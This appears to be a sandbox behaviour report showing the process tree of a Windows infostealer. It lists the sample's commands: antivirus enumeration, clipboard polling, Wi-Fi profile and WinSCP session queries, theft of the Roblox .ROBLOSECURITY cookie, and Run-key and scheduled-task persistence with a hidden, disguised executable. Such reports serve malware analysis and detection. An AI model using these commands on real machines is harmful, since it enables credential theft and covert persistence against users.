C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3544
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:9132
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5784
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:2960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:224
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:872
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5376
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6080
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5920
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:4080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3180
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:10380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6288
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6100
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:3196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6324
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:2600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:380
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4560
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:9468
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1580
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:10712
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6008
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:448
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:10656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2056
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5196
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6016
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3588
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2976
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:10016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5464
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8328
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4580
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5660
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:5620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:728
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5760
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:1812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5848
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6508
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5268
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4828
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6240
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:9428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:8824
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:7180
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:4164
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:11044
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:4072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6272
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:9028
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:8960
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:8840
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:1292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:8364
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:9076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:7244
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4628
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1968
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6404
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:4736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6700
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6592
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:8988
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2348
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4036
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:9016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4844
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:9184
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:10204
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:9424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6172
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:4700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:8380
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4524
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6620
-
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:9276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:8000
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:9284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "mullvad account get"2⤵PID:7996
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -command "function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace "root\\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { "262144" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "262160" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "266240" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "266256" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "393216" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "393232" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "393488" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "397312" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "397328" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "397584" { $defstatus = "Out of date"; $rtstatus = "Enabled" } default { $defstatus = "Unknown"; $rtstatus = "Unknown" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct ""2⤵PID:6780
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "function Get-AntiVirusProduct {3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:8860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:5884 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Suspicious behavior: EnumeratesProcesses
PID:10564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"2⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:8624 -
C:\Windows\system32\netsh.exenetsh wlan show profile3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:8596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""2⤵PID:1564
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"3⤵PID:5732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"2⤵PID:404
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY3⤵PID:7408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"2⤵PID:3120
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
PID:8952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupZ36eyA /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Checker.exe /f"2⤵PID:8592
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupZ36eyA /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Checker.exe /f3⤵PID:6200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupZ36eyA /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Checker.exe\" /F /rl highest"2⤵PID:8064
-
C:\Windows\system32\cmd.execmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupZ36eyA /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Checker.exe\" /F /rl highest3⤵PID:6364
-
C:\Windows\system32\schtasks.exeschtasks /create /sc onlogon /tn WindowsDriverSetupZ36eyA /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Checker.exe\" /F /rl highest4⤵
- Scheduled Task/Job: Scheduled Task
PID:8032
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Checker.exe\"""2⤵
- Hide Artifacts: Hidden Files and Directories
PID:7860 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Checker.exe\""3⤵
- Hide Artifacts: Hidden Files and Directories
PID:3064 -
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Checker.exe4⤵
- Views/modifies file attributes
PID:1900
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Checker.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask ""2⤵PID:2936
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "3⤵
- Command and Scripting Interpreter: PowerShell
PID:10472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5584
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:5996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:404
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:5600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:3808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:7980
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:396
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:9796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:6380
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:8188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:7156 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:7496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:10556 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:6644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:1436
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7304
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:8460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:3280
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:7100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4048
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:5896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:8948
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:4944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:7772 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:8412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:7128
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:5748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:9548
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:10068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:8080
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:5512
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:6292
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:6736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:10312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:8888 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:7636
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:9196 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:8868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:10184
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:6148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:7936 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:8008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:5772
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:6696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:7196 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:10924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:3728
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:5556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4588
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:8256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:6872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:6592
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:2200 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:3440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:8296
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:3692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:1232 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:6044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:8268 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:4280
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:6772 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:8728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:8452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:10848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:6500 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:9464
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:3096
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:8360 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:5632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:9060
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:7640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:5700
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:7888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:10988
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:4460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:5116
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:6936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:9208
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:5160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:2112
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:9440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:9964
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:9072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:404
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:2892
-
